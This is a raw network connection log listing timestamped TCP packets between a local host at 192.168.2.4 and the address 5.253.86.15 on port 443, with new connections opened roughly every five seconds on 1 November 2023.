Nov 1, 2023 08:26:44.296925068 CET	443	49742	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:44.848134995 CET	443	49742	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:44.850519896 CET	49742	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:44.850584030 CET	443	49742	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:47.263824940 CET	443	49742	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:47.263849020 CET	443	49742	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:47.263904095 CET	443	49742	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:47.263922930 CET	49742	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:47.263947010 CET	49742	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:47.266904116 CET	49742	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:52.277892113 CET	49744	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:52.277940989 CET	443	49744	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:52.278037071 CET	49744	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:52.278918028 CET	49744	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:52.278934956 CET	443	49744	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:52.846569061 CET	443	49744	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:52.849006891 CET	49744	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:52.849040985 CET	443	49744	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:56.213314056 CET	443	49744	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:56.213376999 CET	443	49744	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:56.213536024 CET	443	49744	5.253.86.15	192.168.2.4
Nov 1, 2023 08:26:56.213545084 CET	49744	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:56.213618040 CET	49744	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:26:56.214936018 CET	49744	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:01.230674028 CET	49745	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:01.230701923 CET	443	49745	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:01.230782986 CET	49745	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:01.231290102 CET	49745	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:01.231302977 CET	443	49745	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:01.840344906 CET	443	49745	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:01.842677116 CET	49745	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:01.842708111 CET	443	49745	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:07.209460020 CET	443	49745	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:07.209522009 CET	443	49745	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:07.209580898 CET	49745	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:07.209599018 CET	443	49745	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:07.209666967 CET	443	49745	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:07.209717989 CET	49745	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:07.210284948 CET	49745	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:12.216291904 CET	49746	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:12.216331959 CET	443	49746	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:12.216425896 CET	49746	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:12.217045069 CET	49746	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:12.217067957 CET	443	49746	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:12.788328886 CET	443	49746	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:12.791416883 CET	49746	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:12.791448116 CET	443	49746	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:15.206334114 CET	443	49746	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:15.206404924 CET	443	49746	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:15.206538916 CET	49746	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:15.206568003 CET	443	49746	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:15.206793070 CET	443	49746	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:15.206852913 CET	49746	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:15.207314968 CET	49746	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:20.215506077 CET	49748	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:20.215549946 CET	443	49748	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:20.215640068 CET	49748	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:20.216053009 CET	49748	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:20.216063976 CET	443	49748	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:20.770303011 CET	443	49748	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:20.773106098 CET	49748	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:20.773140907 CET	443	49748	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:21.659440994 CET	443	49748	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:21.659480095 CET	443	49748	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:21.659578085 CET	443	49748	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:21.659615993 CET	49748	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:21.659657001 CET	49748	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:21.660476923 CET	49748	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:26.680699110 CET	49750	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:26.680733919 CET	443	49750	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:26.680799007 CET	49750	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:26.681185961 CET	49750	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:26.681199074 CET	443	49750	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:27.238065958 CET	443	49750	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:27.239990950 CET	49750	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:27.240026951 CET	443	49750	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:30.560607910 CET	443	49750	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:30.560642958 CET	443	49750	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:30.560720921 CET	443	49750	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:30.560734987 CET	49750	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:30.560770988 CET	49750	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:30.562414885 CET	49750	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:35.576551914 CET	49751	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:35.576598883 CET	443	49751	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:35.576708078 CET	49751	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:35.577469110 CET	49751	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:35.577481031 CET	443	49751	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:36.148814917 CET	443	49751	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:36.151501894 CET	49751	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:36.151537895 CET	443	49751	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:37.118216991 CET	443	49751	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:37.118279934 CET	443	49751	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:37.118457079 CET	443	49751	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:37.118566036 CET	49751	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:37.118566036 CET	49751	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:37.119379044 CET	49751	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:42.126770020 CET	49752	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:42.126821041 CET	443	49752	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:42.126930952 CET	49752	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:42.127383947 CET	49752	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:42.127405882 CET	443	49752	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:42.699755907 CET	443	49752	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:42.704108000 CET	49752	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:42.704138041 CET	443	49752	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:43.696397066 CET	443	49752	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:43.696459055 CET	443	49752	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:43.696528912 CET	49752	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:43.696544886 CET	443	49752	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:43.696614981 CET	443	49752	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:43.696666002 CET	49752	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:43.697144032 CET	49752	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:48.701262951 CET	49753	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:48.701328039 CET	443	49753	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:48.701441050 CET	49753	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:48.701947927 CET	49753	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:48.701965094 CET	443	49753	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:49.274112940 CET	443	49753	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:49.276582003 CET	49753	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:49.276624918 CET	443	49753	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:51.863493919 CET	443	49753	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:51.863524914 CET	443	49753	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:51.863600016 CET	443	49753	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:51.863605022 CET	49753	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:51.863635063 CET	49753	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:51.864238977 CET	49753	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:56.872026920 CET	49754	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:56.872091055 CET	443	49754	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:56.872179985 CET	49754	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:56.872678041 CET	49754	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:56.872690916 CET	443	49754	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:57.447668076 CET	443	49754	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:57.449601889 CET	49754	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:57.449651957 CET	443	49754	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:59.403769970 CET	443	49754	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:59.403834105 CET	443	49754	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:59.403883934 CET	49754	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:59.403907061 CET	443	49754	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:59.403974056 CET	443	49754	5.253.86.15	192.168.2.4
Nov 1, 2023 08:27:59.404023886 CET	49754	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:27:59.404565096 CET	49754	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:04.419550896 CET	49755	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:04.419603109 CET	443	49755	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:04.419698000 CET	49755	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:04.420183897 CET	49755	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:04.420196056 CET	443	49755	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:04.968214035 CET	443	49755	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:04.970094919 CET	49755	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:04.970127106 CET	443	49755	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:13.168107033 CET	443	49755	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:13.168178082 CET	443	49755	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:13.168313026 CET	49755	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:13.168319941 CET	443	49755	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:13.168394089 CET	49755	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:13.169028044 CET	49755	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:18.184470892 CET	49756	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:18.184525967 CET	443	49756	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:18.184741020 CET	49756	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:18.185148954 CET	49756	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:18.185164928 CET	443	49756	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:18.776864052 CET	443	49756	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:18.779022932 CET	49756	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:18.779063940 CET	443	49756	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:20.674964905 CET	443	49756	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:20.675026894 CET	443	49756	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:20.675185919 CET	49756	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:20.675220966 CET	443	49756	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:20.675240040 CET	443	49756	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:20.675312996 CET	49756	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:20.675992012 CET	49756	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:25.684366941 CET	49757	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:25.684412003 CET	443	49757	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:25.684505939 CET	49757	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:25.685221910 CET	49757	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:25.685241938 CET	443	49757	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:26.268095016 CET	443	49757	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:26.272217989 CET	49757	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:26.272252083 CET	443	49757	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:35.240890026 CET	443	49757	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:35.240955114 CET	443	49757	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:35.241040945 CET	49757	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:35.241076946 CET	443	49757	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:35.241096973 CET	443	49757	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:35.241148949 CET	49757	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:35.242214918 CET	49757	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:40.246911049 CET	49758	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:40.246972084 CET	443	49758	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:40.247051001 CET	49758	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:40.247538090 CET	49758	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:40.247555971 CET	443	49758	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:40.805160046 CET	443	49758	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:40.808257103 CET	49758	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:40.808305979 CET	443	49758	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:43.221370935 CET	443	49758	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:43.221431971 CET	443	49758	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:43.221503019 CET	49758	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:43.221534967 CET	443	49758	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:43.221566916 CET	443	49758	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:43.221621990 CET	49758	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:43.222100973 CET	49758	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:48.243863106 CET	49759	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:48.243907928 CET	443	49759	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:48.243977070 CET	49759	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:48.244446039 CET	49759	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:48.244462013 CET	443	49759	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:48.804970026 CET	443	49759	5.253.86.15	192.168.2.4
Nov 1, 2023 08:28:48.854592085 CET	49759	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:49.073950052 CET	49759	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:28:49.073972940 CET	443	49759	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:04.968277931 CET	443	49759	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:04.968316078 CET	443	49759	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:04.968394041 CET	443	49759	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:04.968398094 CET	49759	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:04.968449116 CET	49759	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:04.969234943 CET	49759	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:09.981513977 CET	49760	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:09.981564045 CET	443	49760	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:09.981703997 CET	49760	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:09.982391119 CET	49760	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:09.982410908 CET	443	49760	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:10.540914059 CET	443	49760	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:10.544176102 CET	49760	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:10.544195890 CET	443	49760	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:12.188158035 CET	443	49760	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:12.188222885 CET	443	49760	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:12.188306093 CET	49760	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:12.188339949 CET	443	49760	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:12.188371897 CET	443	49760	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:12.188653946 CET	49760	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:12.189378023 CET	49760	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:17.200256109 CET	49761	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:17.200310946 CET	443	49761	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:17.200382948 CET	49761	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:17.200728893 CET	49761	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:17.200742006 CET	443	49761	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:17.747292995 CET	443	49761	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:17.749159098 CET	49761	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:17.749178886 CET	443	49761	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:24.904377937 CET	443	49761	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:24.904403925 CET	443	49761	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:24.904469967 CET	443	49761	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:24.904485941 CET	49761	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:24.904524088 CET	49761	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:24.905175924 CET	49761	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:29.919028997 CET	49762	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:29.919080973 CET	443	49762	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:29.919176102 CET	49762	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:29.919580936 CET	49762	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:29.919599056 CET	443	49762	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:30.482258081 CET	443	49762	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:30.490266085 CET	49762	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:30.490309954 CET	443	49762	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:31.747589111 CET	443	49762	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:31.747616053 CET	443	49762	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:31.747684002 CET	443	49762	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:31.747817993 CET	49762	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:31.747817993 CET	49762	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:31.748322964 CET	49762	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:36.877888918 CET	49763	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:36.877948999 CET	443	49763	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:36.878038883 CET	49763	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:36.878597021 CET	49763	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:36.878613949 CET	443	49763	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:37.431683064 CET	443	49763	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:37.600567102 CET	49763	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:37.600626945 CET	443	49763	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:43.463478088 CET	443	49763	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:43.463500977 CET	443	49763	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:43.463560104 CET	443	49763	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:43.463640928 CET	49763	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:43.463674068 CET	49763	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:43.464947939 CET	49763	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:48.481699944 CET	49764	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:48.481781960 CET	443	49764	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:48.481858015 CET	49764	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:48.482351065 CET	49764	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:48.482384920 CET	443	49764	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:49.043400049 CET	443	49764	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:49.045501947 CET	49764	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:49.045522928 CET	443	49764	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:49.959947109 CET	443	49764	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:49.959973097 CET	443	49764	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:49.960032940 CET	443	49764	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:49.960093021 CET	49764	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:49.960131884 CET	49764	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:49.960787058 CET	49764	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:54.965658903 CET	49765	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:54.965697050 CET	443	49765	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:54.965823889 CET	49765	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:54.966306925 CET	49765	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:54.966320038 CET	443	49765	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:55.532701969 CET	443	49765	5.253.86.15	192.168.2.4
Nov 1, 2023 08:29:55.606323957 CET	49765	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:29:55.606379032 CET	443	49765	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:00.071937084 CET	443	49765	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:00.071970940 CET	443	49765	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:00.072041988 CET	443	49765	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:00.072118044 CET	49765	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:00.072118044 CET	49765	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:00.072772980 CET	49765	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:05.075186014 CET	49766	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:05.075253010 CET	443	49766	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:05.075329065 CET	49766	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:05.075800896 CET	49766	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:05.075810909 CET	443	49766	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:05.643811941 CET	443	49766	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:05.646565914 CET	49766	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:05.646600962 CET	443	49766	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:10.850414038 CET	443	49766	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:10.850487947 CET	443	49766	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:10.850584984 CET	443	49766	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:10.850641966 CET	49766	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:10.850697994 CET	49766	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:10.858800888 CET	49766	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:15.871905088 CET	49767	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:15.871939898 CET	443	49767	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:15.872011900 CET	49767	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:15.872438908 CET	49767	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:15.872447014 CET	443	49767	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:16.522491932 CET	443	49767	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:16.524396896 CET	49767	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:16.524415970 CET	443	49767	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:21.208458900 CET	443	49767	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:21.208498955 CET	443	49767	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:21.208568096 CET	443	49767	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:21.208805084 CET	49767	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:21.208805084 CET	49767	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:21.210424900 CET	49767	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:26.216032028 CET	49768	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:26.216084003 CET	443	49768	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:26.216180086 CET	49768	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:26.216660023 CET	49768	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:26.216681004 CET	443	49768	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:26.764487028 CET	443	49768	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:26.768141985 CET	49768	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:26.768233061 CET	443	49768	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:36.717525005 CET	443	49768	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:36.717557907 CET	443	49768	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:36.717614889 CET	443	49768	5.253.86.15	192.168.2.4
Nov 1, 2023 08:30:36.717683077 CET	49768	443	192.168.2.4	5.253.86.15
Nov 1, 2023 08:30:36.717783928 CET	49768	443	192.168.2.4	5.253.86.15
